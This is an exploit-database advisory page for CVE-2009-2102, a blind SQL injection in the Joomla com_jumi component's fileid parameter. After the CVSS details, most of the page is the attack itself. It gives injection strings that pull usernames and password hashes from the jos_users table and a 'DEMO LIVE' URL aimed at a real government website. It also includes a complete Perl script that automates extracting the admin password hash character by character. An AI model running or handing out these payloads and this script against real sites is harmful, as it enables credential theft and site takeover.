Joomla Component com_jumi (fileid) Blind SQL Injection Exploit

2009.06.21
Credit: Chip D3 Bi0s
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-2102
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

------------------------------------------------------------------------------ Joomla Component com_jumi (fileid) Blind SQL-injection Vulnerability ------------------------------------------------------------------------------ ##################################################### # [+] Author : Chip D3 Bi0s # # [+] Email : chipdebios[alt+64]gmail.com # # [+] Vulnerability : Blind SQL injection # ##################################################### Example: http://localHost/path/index.php?option=com_jumi&fileid=n<Sql Code> n=number fileid valid <Sql code>: '+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/* '+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/* /index.php?option=com_jumi&fileid=2'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/* etc, etc... DEMO LIVE: http://www.elciudadano.gov.ec/index.php?option=com_jumi&fileid=2'+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=101/* etc, etc.... +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ if you want to save the work, you can use the following script ------------------------------- #!/usr/bin/perl -w use LWP::UserAgent; print "\t\t-------------------------------------------------------------\n\n"; print "\t\t | Chip d3 Bi0s | \n\n"; print "\t\t Joomla Component com_jumi (fileid) Blind SQL-injection \n\n"; print "\t\t-----------------------------------------------------------------\n\n"; print "http://wwww.host.org/Path: "; chomp(my $target=<STDIN>); print " [-] Introduce fileid: "; chomp($z=<STDIN>); print " [+] Password: "; $column_name="concat(password)"; $table_name="jos_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); for ($x=1;$x<=32;$x++) #x limit referido a la posicion del caracter { #c referido a ascci 48-57, 97-102 for ($c=48;$c<=57;$c++) { $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = "com_"; # print "limit:"; # print "$x"; # print "; assci:"; # print "$c;"; if ($content =~ /$regexp/) {$char=chr($c); print "$char";} } for ($c=97;$c<=102;$c++) { $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = "com_"; # print "limit:"; # print "$x"; # print "; assci:"; # print "$c;"; if ($content =~ /$regexp/) {$char=chr($c); print "$char";} } }

References:

http://www.milw0rm.com/exploits/8968


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top